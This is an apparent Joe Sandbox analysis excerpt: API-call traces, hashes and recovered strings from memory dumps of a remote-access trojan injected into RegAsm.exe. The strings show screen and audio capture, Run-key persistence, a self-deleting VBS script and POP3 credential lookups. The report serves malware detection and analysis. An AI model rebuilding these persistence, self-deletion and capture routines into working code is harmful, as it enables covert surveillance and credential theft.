                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                            • String ID:
                            • API String ID: 1661935332-0
                            • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                            • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                            • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                            • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                            APIs
                              • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$_free$InfoLocale_abort
                            • String ID:
                            • API String ID: 1663032902-0
                            • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                            • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                            • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                            • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                            APIs
                              • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$InfoLocale_abort_free
                            • String ID:
                            • API String ID: 2692324296-0
                            • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                            • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                            • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                            • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                            APIs
                              • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                            • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalEnterEnumLocalesSectionSystem
                            • String ID:
                            • API String ID: 1272433827-0
                            • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                            • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                            • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                            • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                            APIs
                              • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                            • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                            • String ID:
                            • API String ID: 1084509184-0
                            • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                            • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                            • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                            • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                            APIs
                            • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.1 Pro), ref: 0040F920
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoLocale
                            • String ID:
                            • API String ID: 2299586839-0
                            • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                            • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                            • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                            • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                            APIs
                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                            • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                              • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                            • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                            • DeleteDC.GDI32(00000000), ref: 00418F65
                            • DeleteDC.GDI32(00000000), ref: 00418F68
                            • DeleteObject.GDI32(00000000), ref: 00418F6B
                            • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                            • DeleteDC.GDI32(00000000), ref: 00418F9D
                            • DeleteDC.GDI32(00000000), ref: 00418FA0
                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                            • GetCursorInfo.USER32(?), ref: 00418FE2
                            • GetIconInfo.USER32 ref: 00418FF8
                            • DeleteObject.GDI32(?), ref: 00419027
                            • DeleteObject.GDI32(?), ref: 00419034
                            • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                            • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                            • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                            • DeleteDC.GDI32(?), ref: 004191B7
                            • DeleteDC.GDI32(00000000), ref: 004191BA
                            • DeleteObject.GDI32(00000000), ref: 004191BD
                            • GlobalFree.KERNEL32(?), ref: 004191C8
                            • DeleteObject.GDI32(00000000), ref: 0041927C
                            • GlobalFree.KERNEL32(?), ref: 00419283
                            • DeleteDC.GDI32(?), ref: 00419293
                            • DeleteDC.GDI32(00000000), ref: 0041929E
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                            • String ID: DISPLAY
                            • API String ID: 4256916514-865373369
                            • Opcode ID: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                            • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                            • Opcode Fuzzy Hash: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                            • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                            APIs
                              • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                              • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                              • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,`.S,004752F0,?,pth_unenc), ref: 0040B8F6
                              • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                              • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                              • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                            • ExitProcess.KERNEL32 ref: 0040D80B
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                            • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                            • API String ID: 1861856835-1447701601
                            • Opcode ID: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                            • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                            • Opcode Fuzzy Hash: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                            • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                            APIs
                              • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                              • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                              • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,`.S,004752F0,?,pth_unenc), ref: 0040B8F6
                              • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                              • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                              • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,638E1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                            • ExitProcess.KERNEL32 ref: 0040D454
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                            • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`.S$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                            • API String ID: 3797177996-2806175522
                            • Opcode ID: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                            • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                            • Opcode Fuzzy Hash: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                            • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                            APIs
                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                            • ExitProcess.KERNEL32(00000000), ref: 004124DB
                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                            • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                            • CloseHandle.KERNEL32(00000000), ref: 00412576
                            • GetCurrentProcessId.KERNEL32 ref: 0041257C
                            • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                            • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                            • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                            • lstrcatW.KERNEL32 ref: 0041263C
                              • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                            • Sleep.KERNEL32(000001F4), ref: 004126BD
                            • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                            • CloseHandle.KERNEL32(00000000), ref: 004126E4
                            • GetCurrentProcessId.KERNEL32 ref: 004126EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                            • String ID: .exe$8SG$WDH$exepath$open$temp_
                            • API String ID: 2649220323-436679193
                            • Opcode ID: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                            • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                            • Opcode Fuzzy Hash: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                            • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                            APIs
                            • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                            • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
                            • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                            • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                            • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                            • SetEvent.KERNEL32 ref: 0041B2AA
                            • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                            • CloseHandle.KERNEL32 ref: 0041B2CB
                            • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                            • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                            • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                            APIs
                            • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                            • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                            • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                            • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                            • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                            • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                            • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                            • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                            • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                            • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: File$Write$Create
                            • String ID: RIFF$WAVE$data$fmt
                            APIs
                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,`.S,00407709), ref: 004072BF
                            • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                            • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                            • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                            • GetProcAddress.KERNEL32(00000000), ref: 00407308
                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                            • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                            • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                            • GetProcAddress.KERNEL32(00000000), ref: 00407330
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: _free$EnvironmentVariable
                            • String ID: X8S
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                            APIs
                            • _wcslen.LIBCMT ref: 0040CE42
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                            • CopyFileW.KERNEL32 ref: 0040CF0B
                            • _wcslen.LIBCMT ref: 0040CF21
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                            • CopyFileW.KERNEL32 ref: 0040CFBF
                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                            • _wcslen.LIBCMT ref: 0040D001
                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                            • CloseHandle.KERNEL32 ref: 0040D068
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                            • ExitProcess.KERNEL32 ref: 0040D09D
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                            • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$`.S$del$open
                            APIs
                            • lstrlenW.KERNEL32(?), ref: 0041C0C7
                            • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                            • lstrlenW.KERNEL32(?), ref: 0041C0F8
                            • FindFirstVolumeW.KERNEL32 ref: 0041C133
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                            • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                            • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                            • _wcslen.LIBCMT ref: 0041C1CC
                            • FindVolumeClose.KERNEL32 ref: 0041C1EC
                            • GetLastError.KERNEL32 ref: 0041C204
                            • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                            • lstrcatW.KERNEL32 ref: 0041C24A
                            • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                            • GetLastError.KERNEL32 ref: 0041C261
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                            • String ID: ?
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
